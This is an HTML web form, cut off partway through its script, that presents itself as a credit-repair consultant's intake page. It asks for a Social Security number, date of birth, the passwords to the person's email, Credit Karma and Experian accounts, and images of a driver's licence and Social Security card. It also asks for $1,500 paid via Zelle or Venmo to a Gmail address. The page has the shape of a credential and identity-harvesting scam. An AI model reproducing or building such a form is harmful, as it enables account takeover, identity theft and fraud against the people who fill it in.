<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
        <meta http-equiv="X-UA-Compatible" content="ie=edge">
        <title>Business community / consultant | Formstack</title>
        <link rel="shortcut icon" href="favicon.ico" type="image/x-icon">
        <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">
        <link rel="stylesheet" href="https://code.jquery.com/ui/1.12.1/themes/base/jquery-ui.css">
        <link rel="icon" type="image/png" href="https://www.formstack.com/images/favicon/favicon-32x32.png?v=02.28.19" sizes="32x32">
        <link rel="icon" type="image/png" href="https://www.formstack.com/images/favicon/android-chrome-192x192.png?v=02.28.19" sizes="192x192">
        <link rel="icon" type="image/png" href="https://www.formstack.com/images/favicon/favicon-96x96.png?v=02.28.19" sizes="96x96">
        <link rel="icon" type="image/png" href="https://www.formstack.com/images/favicon/favicon-16x16.png?v=02.28.19" sizes="16x16">
        <style>
            /* Font-face */
            @import url('https://fonts.googleapis.com/css?family=Montserrat:100,400,500,700');

            /* Reset */
            *, body {padding:0; margin:0;}
            body {font-family:'Montserrat', sans-serif;}
            label {font-weight:500; font-size:1.25rem; position:relative;}
            label > span#required {font-family:'Montserrat', sans-serif; font-size:1rem; color:red; position:absolute;}
            select, input {border-radius:50px !important; border-color:#000 !important;}
            textarea {border-radius:20px !important; border-color:#000 !important;}
            select {cursor:pointer;}
            input, textarea {cursor:text;}
            input::placeholder, textarea::placeholder {font-weight:500; color:#C1C1C1 !important;}
            input[type~="file"] {display:none; opacity:0; visibility:hidden;}
            .ui-widget-content {
                background-color:#EDEADA !important;
            }
            .ui-datepicker-header {background-color:#EA3652; color:#FFFFFF;}
            .ui-datepicker-prev-hover, .ui-datepicker-next-hover {background-color:transparent !important; border:none !important; color:#FFFFFF; cursor:pointer;}
            .ui-state-highlight {
                border: 1px solid #5eda68 !important;
                background: #b0ff90 !important;
                color: #207720 !important;
            }
            .ui-datepicker-trigger {height:25px; cursor:pointer;}
            div.bootstrap-filestyle span.group-span-filestyle > label {border-radius:0 !important; border:none !important; cursor:pointer; background-color:#3B8597; font-family:'Montserrat', sans-serif; font-weight:500; font-size:1.25rem; padding:.2rem 1rem;}
            div.bootstrap-filestyle span.group-span-filestyle > label:active,
            div.bootstrap-filestyle span.group-span-filestyle > label.btn-secondary:not(:disabled):not(.disabled):active,
            div.bootstrap-filestyle span.group-span-filestyle > label:hover,
            div.bootstrap-filestyle span.group-span-filestyle > label:focus {border:none !important; background-color:#2B6D7D;}
            div.bootstrap-filestyle input[placeholder~="file"] {border-radius:0 !important; border:none !important; background-color:#EDEDED; font-family:'Montserrat', sans-serif; font-weight:500; color:#464646 !important; padding:.2rem 1rem;}
            div.bootstrap-filestyle input[placeholder~="file"]::placeholder {font-family:'Montserrat', sans-serif; font-weight:500; color:#464646 !important;}
            .text-success {color:#21B573 !important;}
            .text-primary {color:#308596 !important;}
            .text-gray {color:#434343 !important;}
            .bg-success {background-color:#21B573 !important;}
            .bg-primary {background-color:#308596 !important;}
            #personal-info .form-control:focus {
                border-color: rgba(126, 239, 104, 0.8) !important;
                box-shadow: 0 1px 1px rgba(0, 0, 0, 0.075) inset, 0 0 8px rgba(126, 239, 104, 0.6) !important;
                outline: 0 none !important;
            }
            #email .form-control:focus,
            #credit-karma .form-control:focus,
            #experian .form-control:focus,
            #authorization .form-control:focus {
                border-color: rgba(104, 147, 239, 0.8) !important;
                box-shadow: 0 1px 1px rgba(0, 0, 0, 0.075) inset, 0 0 8px rgba(104, 147, 239, 0.6) !important;
                outline: 0 none !important;
            }
            .signature-wrapper {
                width:400px;
                height:200px;
                user-select:none;
            }
            .signature-pad {
                width:100%;
                height:100%;
                background-color:white;
                border-radius:20px;
                border:solid 1px #000;
            }
            button.btn {border-radius:50px !important; padding:.8rem 2.5rem; font-family:'Montserrat', sans-serif; font-weight:500 !important; font-size:1.25rem;}
            
            /* Define rule */
            .title {font-weight:700; overflow-wrap:break-word;}
            .text-payopt1 {color:#6C1BD3;}
            .text-payopt2 {color:#4395CE;}
            .signature-btn {border:none; outline:none; border-radius:50px; padding:.2rem 2rem; font-family:'Montserrat', sans-serif; font-weight:500 !important; font-size:1rem;}
            div.submit {background-color:#E2E2E2; padding:4rem 0;}
            div.submit > button.btn[type="button"][type="submit"] {transition:ease-in-out all 200ms;}
            div.submit > button.btn[type="button"]:hover {background-color:#F3F3F3 !important;}
            div.submit > button.btn[type="submit"] {background-color:#69E48F !important; font-weight:700 !important;}
            div.submit > button.btn[type="submit"]:hover {background-color:#67D689 !important;}
            #sec-date {width:300px;}
            #sec-dob {width:100%;}
            #desc {font-weight:500; font-size:1.18rem !important;}
            #link {border-radius:20px; font-size:1.18rem; font-weight:500; padding:.4rem 1rem; margin:.1rem 0; display:inline-block; transition:ease-in-out all 200ms;}
            #link:hover {background-color:#4A9E66 !important;}
            #list {list-style:decimal outside; position:relative; left:1rem; font-weight:500; font-size:1.18rem !important; width:70%;}
        </style>
    </head>
    <body>
        <form action="#!" method="POST" class="w-100">
            <div class="container my-5 p-0">
                <section id="personal-info" class="mb-4 d-inline-block">
                    <div class="form-group mb-5">
                        <section class="row align-items-start justify-content-between m-0">
                            <div class="col-5 d-flex align-items-center p-0">
                                <img src="https://i.imgur.com/jhm5oJ8.png" alt="jhm5oJ8.png" class="mr-2"/>
                                <h2 class="title text-success my-0 ml-1">Personal Information</h2>
                            </div>
                            <div class="col-auto p-0">
                                <label for="selectedDay" class="text-gray">Date, dd/mm/yyyy<span id="required">*</span></label>
                                <section id="sec-date" class="row m-0 align-items-center">
                                    <select id="data-dateDay" class="form-control custom-select col-3" name="data-dateDay" required></select>
                                    <select id="data-dateMonth" class="form-control custom-select col-3 mx-2" name="data-dateMonth" required></select>
                                    <select id="data-dateYear" class="form-control custom-select col-4" name="data-dateYear" required></select>
                                    <div class="col-1 p-0 ml-2">
                                        <input type="hidden" id="data-datePicker">
                                    </div>
                                </section>
                            </div>
                        </section>
                    </div>
                    <div class="form-group">
                        <section class="row align-items-start m-0">
                            <div class="col-6 p-0">
                                <div class="form-group">
                                    <label for="f-name">Full name as it appears on Driver's License<span id="required">*</span></label>
                                    <div class="row m-0">
                                        <div class="col-7 p-0">
                                            <input type="text" name="data-fname" id="data-fname" class="form-control w-100 d-inline-block mb-2" placeholder="First name" required>
                                            <input type="text" name="data-lname" id="data-lname" class="form-control w-100 d-inline-block mt-1" placeholder="Last name" required>
                                        </div>
                                    </div>
                                </div>
                                <div class="form-group">
                                    <label for="d-o-b">Date of Birth, dd/mm/yyyy<span id="required">*</span></label>
                                    <div class="row m-0">
                                        <div class="col-7 p-0">
                                            <div class="w-100 p-0">
                                                <section id="sec-dob" class="row m-0 align-items-center">
                                                    <select id="data-dobDay" class="form-control custom-select col-3" name="data-dobDay" required></select>
                                                    <select id="data-dobMonth" class="form-control custom-select col-3 mx-2" name="data-dobMonth" required></select>
                                                    <select id="data-dobYear" class="form-control custom-select col-4" name="data-dobYear" required></select>
                                                    <div class="col-1 p-0 ml-2">
                                                        <input type="hidden" id="data-dobPicker">
                                                    </div>
                                                </section>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div class="form-group">
                                    <label for="phone">Phone<span id="required">*</span></label>
                                    <div class="row m-0">
                                        <div class="col-7 p-0">
                                            <input type="text" name="data-phone" id="data-phone" class="form-control w-100 d-inline-block" placeholder="Phone number" required>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div class="col-6 p-0">
                                <div class="form-group">
                                    <label for="address">Address<span id="required">*</span></label>
                                    <div class="row m-0">
                                        <div class="col-12 p-0">
                                            <textarea name="data-address" id="data-address" class="form-control w-100 d-inline-block mb-2 p-3" rows="5" placeholder="Please fill in your address, on this form" required></textarea>
                                            <div class="row m-0">
                                                <div class="col-3 p-0">
                                                    <input type="text" name="data-city" id="data-city" class="form-control" placeholder="City" required>
                                                </div>
                                                <div class="col p-0 mx-2">
                                                    <select id="data-state" class="form-control custom-select" name="data-state" required>
                                                        <option value="" selected hidden disabled>State</option>
                                                    </select>
                                                </div>
                                                <div class="col-3 p-0">
                                                    <input type="text" name="data-zcode" id="data-zcode" class="form-control" placeholder="ZIP code" required>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div class="form-group">
                                    <label for="address">Social security number<span id="required">*</span></label>
                                    <div class="row m-0">
                                        <div class="col-7 p-0">
                                            <input type="text" name="data-secnum" id="data-secnum" class="form-control" placeholder="Security number" required>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </section>
                    </div>
                </section>
                <section id="email" class="mb-5 d-inline-block">
                    <section class="row align-items-start justify-content-between m-0">
                        <div class="col-12 d-flex align-items-center p-0 mb-4">
                            <img src="https://i.imgur.com/Q4DmMzX.png" alt="jhm5oJ8.png" class="mr-2"/>
                            <h2 class="title text-primary my-0 ml-1">Email</h2>
                        </div>
                        <div class="col-8 p-0 mt-1">
                            <p id="desc" class="text-gray">Create a new or existing email address and send us the user ID and password for the email address. Click link below to create new email and please submit the login user ID and password. (Its Free!)</p>
                            <a id="link" href="https://accounts.google.com/signup" target="_blank" class="text-white bg-success">https://accounts.google.com/signup</a>
                        </div>
                        <div class="col-8 p-0 mt-3 d-flex align-items-center">
                            <div class="form-group flex-grow-1 mr-1">
                                <label for="data-email">Email<span id="required">*</span></label>
                                <input type="email" name="data-email" id="data-email" class="form-control" placeholder="Your account email" required>
                            </div>
                            <div class="form-group flex-grow-1 ml-1">
                                <label for="data-password">Password<span id="required">*</span></label>
                                <input type="password" name="data-password" id="data-password" class="form-control" placeholder="Password" required>
                            </div>
                        </div>
                    </section>
                </section>
                <section id="credit-karma" class="mb-5 d-inline-block">
                    <section class="row align-items-start justify-content-between m-0">
                        <div class="col-12 d-flex align-items-center p-0 mb-4">
                            <img src="https://i.imgur.com/Q4DmMzX.png" alt="jhm5oJ8.png" class="mr-2"/>
                            <h2 class="title text-primary my-0 ml-1">Credit Karma</h2>
                        </div>
                        <div class="col-8 p-0 mt-1">
                            <p id="desc" class="text-gray">If you don't have an account with Credit Karma click the link bellow to create one and please submit the login userID and password (Its Free!). Please make sure that the password and user ID work before submitting the information</p>
                            <a id="link" href="https://www.creditkarma.com/signup" target="_blank" class="text-white bg-success">https://www.creditkarma.com/signup</a>
                        </div>
                        <div class="col-8 p-0 mt-3 d-flex align-items-center">
                            <div class="form-group flex-grow-1 mr-1">
                                <label for="data-ckuserid">CK user id<span id="required">*</span></label>
                                <input type="text" name="data-ckuserid" id="data-ckuserid" class="form-control" placeholder="Your credit karma ID" required>
                            </div>
                            <div class="form-group flex-grow-1 ml-1">
                                <label for="data-ckpassword">CK password<span id="required">*</span></label>
                                <input type="password" name="data-ckpassword" id="data-ckpassword" class="form-control" placeholder="Password" required>
                            </div>
                        </div>
                    </section>
                </section>
                <section id="experian" class="mb-5 d-inline-block">
                    <section class="row align-items-start justify-content-between m-0">
                        <div class="col-12 d-flex align-items-center p-0 mb-4">
                            <img src="https://i.imgur.com/Q4DmMzX.png" alt="jhm5oJ8.png" class="mr-2"/>
                            <h2 class="title text-primary my-0 ml-1">Experian</h2>
                        </div>
                        <div class="col-8 p-0 mt-1">
                            <p id="desc" class="text-gray">Create an account with Experian.com and submit the logi user ID and Password, please use link below to create account. (Its Free!) Please make sure that the password and user ID work before submitting the information</p>
                            <a id="link" href="https://www.experian.com" target="_blank" class="text-white bg-success">https://www.experian.com</a>
                        </div>
                        <div class="col-8 p-0 mt-3 d-flex align-items-center">
                            <div class="form-group flex-grow-1 mr-1">
                                <label for="data-exuserid">User id<span id="required">*</span></label>
                                <input type="text" name="data-exuserid" id="data-exuserid" class="form-control" placeholder="Your experian ID" required>
                            </div>
                            <div class="form-group flex-grow-1 ml-1">
                                <label for="data-expassword">Password<span id="required">*</span></label>
                                <input type="password" name="data-expassword" id="data-expassword" class="form-control" placeholder="Password" required>
                            </div>
                        </div>
                    </section>
                </section>
                <section id="acr" class="mb-5 d-inline-block w-100">
                    <section class="row align-items-start m-0">
                        <div class="col-6">
                            <section class="row flex-column m-0">
                                <div class="col-12 d-flex align-items-center p-0 mb-4">
                                    <img src="https://i.imgur.com/Q4DmMzX.png" alt="jhm5oJ8.png" class="mr-2"/>
                                    <h2 class="title text-primary my-0 ml-1">Annual Credit Report</h2>
                                </div>
                                <div class="col-12 p-0 mt-1 mb-2">
                                    <p id="desc" class="text-gray mb-2">For starting, please go to:</p>
                                    <a id="link" href="https://www.annualcreditreport.com" target="_blank" class="text-white bg-success mb-3">https://www.annualcreditreport.com</a>
                                    <ol id="list" class="text-gray">
                                        <li>Click on the red Request your free credit report</li>
                                        <li>Again click on the red Request your free credit report</li>
                                        <li>Fill out a form</li>
                                        <li>Pick the reports you want</li>
                                    </ol>
                                    <p id="desc" class="text-gray mb-2">Choose Equifax first<br>Then complete steps 1-4 again to pull the transunion credit report<br><br>Before you get your credit reports, you will answer a fre more questions, please pay close attention because if you answer them incorrectly you will not be able to access the files.<br><br>Save as PDF to the desktop and upload it bellow</p>
                                </div>
                                <div class="col-7 p-0 mt-3">
                                    <div class="form-group">
                                        <label for="data-equfsile">Equifax file<span id="required">*</span></label>
                                        <input type="file" name="data-equfsile" id="data-equfsile" class="filestyle" data-input="true" data-buttonBefore="true" data-placeholder="No file selected" required>
                                    </div>
                                    <div class="form-group">
                                        <label for="data-tranfile">Transunion file<span id="required">*</span></label>
                                        <input type="file" name="data-tranfile" id="data-tranfile" class="filestyle" data-input="true" data-buttonBefore="true" data-placeholder="No file selected" required>
                                    </div>
                                </div>
                            </section>
                        </div>
                        <div class="col-6">
                            <img src="https://i.imgur.com/Mswwh6Z.png" alt="Mswwh6Z.png" width="100%">
                        </div>
                    </section>
                </section>
                <section id="ssp" class="mb-5 d-inline-block w-100">
                    <section class="row align-items-start m-0">
                        <div class="col-12 p-0">
                            <section class="row flex-column m-0">
                                <div class="col-12 d-flex align-items-center p-0 mb-4">
                                    <img src="https://i.imgur.com/Q4DmMzX.png" alt="jhm5oJ8.png" class="mr-2"/>
                                    <h2 class="title text-primary my-0 ml-1">ID/Social Security Picture</h2>
                                </div>
                                <div class="col-7 p-0 mt-3 d-flex">
                                    <div class="form-group flex-grow-1 mr-4">
                                        <label for="data-dlid">DL/ID<span id="required">*</span></label>
                                        <input type="file" name="data-dlid" id="data-dlid" class="filestyle" data-input="true" data-buttonBefore="true" data-placeholder="No file selected" required>
                                    </div>
                                    <div class="form-group flex-grow-1 ml-4">
                                        <label for="data-ssc">Social Security Card<span id="required">*</span></label>
                                        <input type="file" name="data-ssc" id="data-ssc" class="filestyle" data-input="true" data-buttonBefore="true" data-placeholder="No file selected" required>
                                    </div>
                                </div>
                            </section>
                        </div>
                    </section>
                </section>
                <section id="authorization" class="mb-5 d-inline-block">
                    <section class="row align-items-start m-0">
                        <div class="col-12">
                            <section class="row flex-column m-0">
                                <div class="col-12 d-flex align-items-center p-0 mb-4">
                                    <img src="https://i.imgur.com/Q4DmMzX.png" alt="jhm5oJ8.png" class="mr-2"/>
                                    <h2 class="title text-primary my-0 ml-1">Authorization</h2>
                                </div>
                                <div class="col-8 p-0 mt-1 mb-2">
                                    <p id="desc" class="text-gray mb-2">Create and account with Experian.com and submit the login user ID and Password, please use link below to create account. (Its Free!) Please make sure that the password and user ID work before submitting the information</p>
                                    <a id="link" href="https://www.experian.com" target="_blank" class="text-white bg-success mb-3">https://www.experia.com</a>
                                </div>
                                <div class="col-9 p-0 mt-3 d-flex">
                                    <section class="row m-0">
                                        <div class="col form-group mr-4 p-0">
                                            <label for="data-signature">Signature/please sign below*<span id="required">*</span></label>
                                            <div class="signature-wrapper d-flex flex-column justify-content-start">
                                                <canvas id="signature-pad" class="signature-pad mb-2" width="100%"></canvas>
                                                <button type="button" id="signature-clear" class="signature-btn bg-primary text-white ml-auto">Clear</button>
                                            </div>
                                        </div>
                                        <div class="col-auto form-group ml-4 p-0">
                                            <label for="data-tranfile" class="mr-5">Person who reffered you</label>
                                            <input type="text" name="data-reffered" id="data-reffered" class="form-control" required>
                                        </div>
                                    </section>
                                </div>
                            </section>
                        </div>
                    </section>
                </section>
                <section id="cfs" class="mb-5 d-inline-block w-100">
                    <section class="row align-items-start m-0">
                        <div class="col-12">
                            <section class="row flex-column m-0">
                                <div class="col-12 d-flex align-items-center p-0 mb-4">
                                    <img src="https://i.imgur.com/Q4DmMzX.png" alt="jhm5oJ8.png" class="mr-2"/>
                                    <h2 class="title text-primary my-0 ml-1">Cost For Services</h2>
                                </div>
                                <div class="col-8 p-0 mt-1 mb-2">
                                    <p id="desc" class="text-gray mb-2">The cost is $500 per Bureau for a total of $1,500 for all 3 Bureaus (Equifax, Experian & Transunion) First payment of $750 to be paid on the day we start working on your file and the other $750 at the completion of the file.</p>
                                </div>
                            </section>
                        </div>
                    </section>
                </section>
                <section id="payment-methods" class="mb-3 d-inline-block w-100">
                    <section class="row align-items-start m-0">
                        <div class="col-12">
                            <section class="row flex-column m-0">
                                <div class="col-12 d-flex align-items-center p-0 mb-4">
                                    <img src="https://i.imgur.com/jhm5oJ8.png" alt="jhm5oJ8.png" class="mr-2"/>
                                    <h2 class="title text-success my-0 ml-1">Payment Methods</h2>
                                </div>
                                <div class="col-9 p-0 mt-1 mb-2">
                                    <img src="https://i.imgur.com/mR2H4FB.png" alt="mR2H4FB.png"/>
                                    <p id="desc" class="text-payopt1 mt-2">PAYMENT OPTION #1 - Send Payment via Zelle to: crowncreditpro@gmail.com<br>https://www.zellepay.com</p>
                                </div>
                                <div class="col-9 p-0 mt-1 mb-2">
                                    <img src="https://i.imgur.com/Xtn0MaC.png" alt="Xtn0MaC.png"/>
                                    <p id="desc" class="text-payopt2 mt-2">PAYMENT OPTION #2 - Send Payment via Vemmo to: @CrownCreditPro<br>https://venmo.com</p>
                                </div>
                            </section>
                        </div>
                    </section>
                </section>
            </div>
            <div class="submit text-center">
                <button type="button" class="btn text-gray bg-white mr-1">Save and resume later</button>
                <button type="submit" class="btn text-white bg-success ml-1">Submit form</button>
            </div>
        </form>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
        <script src="https://code.jquery.com/ui/1.12.1/jquery-ui.js"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js" integrity="sha384-UO2eT0CpHqdSJQ6hJty5KVphtPhzWj9WO1clHTMGa3JDZwrnQq4sF86dIHNDz0W1" crossorigin="anonymous"></script>
        <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js" integrity="sha384-JjSmVgyd0p3pXB1rRibZUAYoIIy6OrQ6VrjIEaFf/nJGzIxFDsf4x0xIM+B07jRM" crossorigin="anonymous"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-filestyle/2.1.0/bootstrap-filestyle.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/signature_pad@2.3.2/dist/signature_pad.min.js"></script>
        <script>
            /**************** 
            * DATE/CALENDAR *
            *****************/
            var
                monthList={1:"Jan", 2:"Feb", 3:"Mar", 4:"Apr", 5:"May", 6:"Jun", 7:"Jul", 8:"Aug", 9:"Sep", 10:"Oct", 11:"Nov", 12:"Dec"},
                stateList=[{"name":"Afghanistan", "code":"AF"}, {"name":"land Islands", "code":"AX"}, {"name":"Albania", "code":"AL"}, {"name":"Algeria", "code":"DZ"}, {"name":"American Samoa", "code":"AS"}, {"name":"Andorra", "code":"AD"}, {"name":"Angola", "code":"AO"}, {"name":"Anguilla", "code":"AI"}, {"name":"Antarctica", "code":"AQ"}, {"name":"Antigua and Barbuda", "code":"AG"}, {"name":"Argentina", "code":"AR"}, {"name":"Armenia", "code":"AM"}, {"name":"Aruba", "code":"AW"}, {"name":"Australia", "code":"AU"}, {"name":"Austria", "code":"AT"}, {"name":"Azerbaijan", "code":"AZ"}, {"name":"Bahamas", "code":"BS"}, {"name":"Bahrain", "code":"BH"}, {"name":"Bangladesh", "code":"BD"}, {"name":"Barbados", "code":"BB"}, {"name":"Belarus", "code":"BY"}, {"name":"Belgium", "code":"BE"}, {"name":"Belize", "code":"BZ"}, {"name":"Benin", "code":"BJ"}, {"name":"Bermuda", "code":"BM"}, {"name":"Bhutan", "code":"BT"}, {"name":"Bolivia", "code":"BO"}, {"name":"Bosnia and Herzegovina", "code":"BA"}, {"name":"Botswana", "code":"BW"}, {"name":"Bouvet Island", "code":"BV"}, {"name":"Brazil", "code":"BR"}, {"name":"British Indian Ocean Territory", "code":"IO"}, {"name":"Brunei Darussalam", "code":"BN"}, {"name":"Bulgaria", "code":"BG"}, {"name":"Burkina Faso", "code":"BF"}, {"name":"Burundi", "code":"BI"}, {"name":"Cambodia", "code":"KH"}, {"name":"Cameroon", "code":"CM"}, {"name":"Canada", "code":"CA"}, {"name":"Cape Verde", "code":"CV"}, {"name":"Cayman Islands", "code":"KY"}, {"name":"Central African Republic", "code":"CF"}, {"name":"Chad", "code":"TD"}, {"name":"Chile", "code":"CL"}, {"name":"China", "code":"CN"}, {"name":"Christmas Island", "code":"CX"}, {"name":"Cocos (Keeling) Islands", "code":"CC"}, {"name":"Colombia", "code":"CO"}, {"name":"Comoros", "code":"KM"}, {"name":"Congo", "code":"CG"}, {"name":"Congo, The Democratic Republic of the", "code":"CD"}, {"name":"Cook Islands", "code":"CK"}, {"name":"Costa Rica", "code":"CR"}, {"name":"Cote D'Ivoire", "code":"CI"}, {"name":"Croatia", "code":"HR"}, {"name":"Cuba", "code":"CU"}, {"name":"Cyprus", "code":"CY"}, {"name":"Czech Republic", "code":"CZ"}, {"name":"Denmark", "code":"DK"}, {"name":"Djibouti", "code":"DJ"}, {"name":"Dominica", "code":"DM"}, {"name":"Dominican Republic", "code":"DO"}, {"name":"Ecuador", "code":"EC"}, {"name":"Egypt", "code":"EG"}, {"name":"El Salvador", "code":"SV"}, {"name":"Equatorial Guinea", "code":"GQ"}, {"name":"Eritrea", "code":"ER"}, {"name":"Estonia", "code":"EE"}, {"name":"Ethiopia", "code":"ET"}, {"name":"Falkland Islands (Malvinas)", "code":"FK"}, {"name":"Faroe Islands", "code":"FO"}, {"name":"Fiji", "code":"FJ"}, {"name":"Finland", "code":"FI"}, {"name":"France", "code":"FR"}, {"name":"French Guiana", "code":"GF"}, {"name":"French Polynesia", "code":"PF"}, {"name":"French Southern Territories", "code":"TF"}, {"name":"Gabon", "code":"GA"}, {"name":"Gambia", "code":"GM"}, {"name":"Georgia", "code":"GE"}, {"name":"Germany", "code":"DE"}, {"name":"Ghana", "code":"GH"}, {"name":"Gibraltar", "code":"GI"}, {"name":"Greece", "code":"GR"}, {"name":"Greenland", "code":"GL"}, {"name":"Grenada", "code":"GD"}, {"name":"Guadeloupe", "code":"GP"}, {"name":"Guam", "code":"GU"}, {"name":"Guatemala", "code":"GT"}, {"name":"Guernsey", "code":"GG"}, {"name":"Guinea", "code":"GN"}, {"name":"Guinea-Bissau", "code":"GW"}, {"name":"Guyana", "code":"GY"}, {"name":"Haiti", "code":"HT"}, {"name":"Heard Island and Mcdonald Islands", "code":"HM"}, {"name":"Holy See (Vatican City State)", "code":"VA"}, {"name":"Honduras", "code":"HN"}, {"name":"Hong Kong", "code":"HK"}, {"name":"Hungary", "code":"HU"}, {"name":"Iceland", "code":"IS"}, {"name":"India", "code":"IN"}, {"name":"Indonesia", "code":"ID"}, {"name":"Iran, Islamic Republic Of", "code":"IR"}, {"name":"Iraq", "code":"IQ"}, {"name":"Ireland", "code":"IE"}, {"name":"Isle of Man", "code":"IM"}, {"name":"Israel", "code":"IL"}, {"name":"Italy", "code":"IT"}, {"name":"Jamaica", "code":"JM"}, {"name":"Japan", "code":"JP"}, {"name":"Jersey", "code":"JE"}, {"name":"Jordan", "code":"JO"}, {"name":"Kazakhstan", "code":"KZ"}, {"name":"Kenya", "code":"KE"}, {"name":"Kiribati", "code":"KI"}, {"name":"Korea, Democratic People'S Republic of", "code":"KP"}, {"name":"Korea, Republic of", "code":"KR"}, {"name":"Kuwait", "code":"KW"}, {"name":"Kyrgyzstan", "code":"KG"}, {"name":"Lao People'S Democratic Republic", "code":"LA"}, {"name":"Latvia", "code":"LV"}, {"name":"Lebanon", "code":"LB"}, {"name":"Lesotho", "code":"LS"}, {"name":"Liberia", "code":"LR"}, {"name":"Libyan Arab Jamahiriya", "code":"LY"}, {"name":"Liechtenstein", "code":"LI"}, {"name":"Lithuania", "code":"LT"}, {"name":"Luxembourg", "code":"LU"}, {"name":"Macao", "code":"MO"}, {"name":"Macedonia, The Former Yugoslav Republic of", "code":"MK"}, {"name":"Madagascar", "code":"MG"}, {"name":"Malawi", "code":"MW"}, {"name":"Malaysia", "code":"MY"}, {"name":"Maldives", "code":"MV"}, {"name":"Mali", "code":"ML"}, {"name":"Malta", "code":"MT"}, {"name":"Marshall Islands", "code":"MH"}, {"name":"Martinique", "code":"MQ"}, {"name":"Mauritania", "code":"MR"}, {"name":"Mauritius", "code":"MU"}, {"name":"Mayotte", "code":"YT"}, {"name":"Mexico", "code":"MX"}, {"name":"Micronesia, Federated States of", "code":"FM"}, {"name":"Moldova, Republic of", "code":"MD"}, {"name":"Monaco", "code":"MC"}, {"name":"Mongolia", "code":"MN"}, {"name":"Montenegro", "code":"ME"}, {"name":"Montserrat", "code":"MS"}, {"name":"Morocco", "code":"MA"}, {"name":"Mozambique", "code":"MZ"}, {"name":"Myanmar", "code":"MM"}, {"name":"Namibia", "code":"NA"}, {"name":"Nauru", "code":"NR"}, {"name":"Nepal", "code":"NP"}, {"name":"Netherlands", "code":"NL"}, {"name":"Netherlands Antilles", "code":"AN"}, {"name":"New Caledonia", "code":"NC"}, {"name":"New Zealand", "code":"NZ"}, {"name":"Nicaragua", "code":"NI"}, {"name":"Niger", "code":"NE"}, {"name":"Nigeria", "code":"NG"}, {"name":"Niue", "code":"NU"}, {"name":"Norfolk Island", "code":"NF"}, {"name":"Northern Mariana Islands", "code":"MP"}, {"name":"Norway", "code":"NO"}, {"name":"Oman", "code":"OM"}, {"name":"Pakistan", "code":"PK"}, {"name":"Palau", "code":"PW"}, {"name":"Palestinian Territory, Occupied", "code":"PS"}, {"name":"Panama", "code":"PA"}, {"name":"Papua New Guinea", "code":"PG"}, {"name":"Paraguay", "code":"PY"}, {"name":"Peru", "code":"PE"}, {"name":"Philippines", "code":"PH"}, {"name":"Pitcairn", "code":"PN"}, {"name":"Poland", "code":"PL"}, {"name":"Portugal", "code":"PT"}, {"name":"Puerto Rico", "code":"PR"}, {"name":"Qatar", "code":"QA"}, {"name":"Reunion", "code":"RE"}, {"name":"Romania", "code":"RO"}, {"name":"Russian Federation", "code":"RU"}, {"name":"RWANDA", "code":"RW"}, {"name":"Saint Helena", "code":"SH"}, {"name":"Saint Kitts and Nevis", "code":"KN"}, {"name":"Saint Lucia", "code":"LC"}, {"name":"Saint Pierre and Miquelon", "code":"PM"}, {"name":"Saint Vincent and the Grenadines", "code":"VC"}, {"name":"Samoa", "code":"WS"}, {"name":"San Marino", "code":"SM"}, {"name":"Sao Tome and Principe", "code":"ST"}, {"name":"Saudi Arabia", "code":"SA"}, {"name":"Senegal", "code":"SN"}, {"name":"Serbia", "code":"RS"}, {"name":"Seychelles", "code":"SC"}, {"name":"Sierra Leone", "code":"SL"}, {"name":"Singapore", "code":"SG"}, {"name":"Slovakia", "code":"SK"}, {"name":"Slovenia", "code":"SI"}, {"name":"Solomon Islands", "code":"SB"}, {"name":"Somalia", "code":"SO"}, {"name":"South Africa", "code":"ZA"}, {"name":"South Georgia and the South Sandwich Islands", "code":"GS"}, {"name":"Spain", "code":"ES"}, {"name":"Sri Lanka", "code":"LK"}, {"name":"Sudan", "code":"SD"}, {"name":"Suriname", "code":"SR"}, {"name":"Svalbard and Jan Mayen", "code":"SJ"}, {"name":"Swaziland", "code":"SZ"}, {"name":"Sweden", "code":"SE"}, {"name":"Switzerland", "code":"CH"}, {"name":"Syrian Arab Republic", "code":"SY"}, {"name":"Taiwan, Province of China", "code":"TW"}, {"name":"Tajikistan", "code":"TJ"}, {"name":"Tanzania, United Republic of", "code":"TZ"}, {"name":"Thailand", "code":"TH"}, {"name":"Timor-Leste", "code":"TL"}, {"name":"Togo", "code":"TG"}, {"name":"Tokelau", "code":"TK"}, {"name":"Tonga", "code":"TO"}, {"name":"Trinidad and Tobago", "code":"TT"}, {"name":"Tunisia", "code":"TN"}, {"name":"Turkey", "code":"TR"}, {"name":"Turkmenistan", "code":"TM"}, {"name":"Turks and Caicos Islands", "code":"TC"}, {"name":"Tuvalu", "code":"TV"}, {"name":"Uganda", "code":"UG"}, {"name":"Ukraine", "code":"UA"}, {"name":"United Arab Emirates", "code":"AE"}, {"name":"United Kingdom", "code":"GB"}, {"name":"United States", "code":"US"}, {"name":"United States Minor Outlying Islands", "code":"UM"}, {"name":"Uruguay", "code":"UY"}, {"name":"Uzbekistan", "code":"UZ"}, {"name":"Vanuatu", "code":"VU"}, {"name":"Venezuela", "code":"VE"}, {"name":"Viet Nam", "code":"VN"}, {"name":"Virgin Islands, British", "code":"VG"}, {"name":"Virgin Islands, U.S.", "code":"VI"}, {"name":"Wallis and Futuna", "code":"WF"}, {"name":"Western Sahara", "code":"EH"}, {"name":"Yemen", "code":"YE"}, {"name":"Zambia", "code":"ZM"}, {"name":"Zimbabwe", "code":"ZW"}],
                lenDay=31,
                lenMonth=12,
                currentDate=new Date().getFullYear(),
                maxDate=currentDate,
                minDate=maxDate-2,
                maxDoB=currentDate,
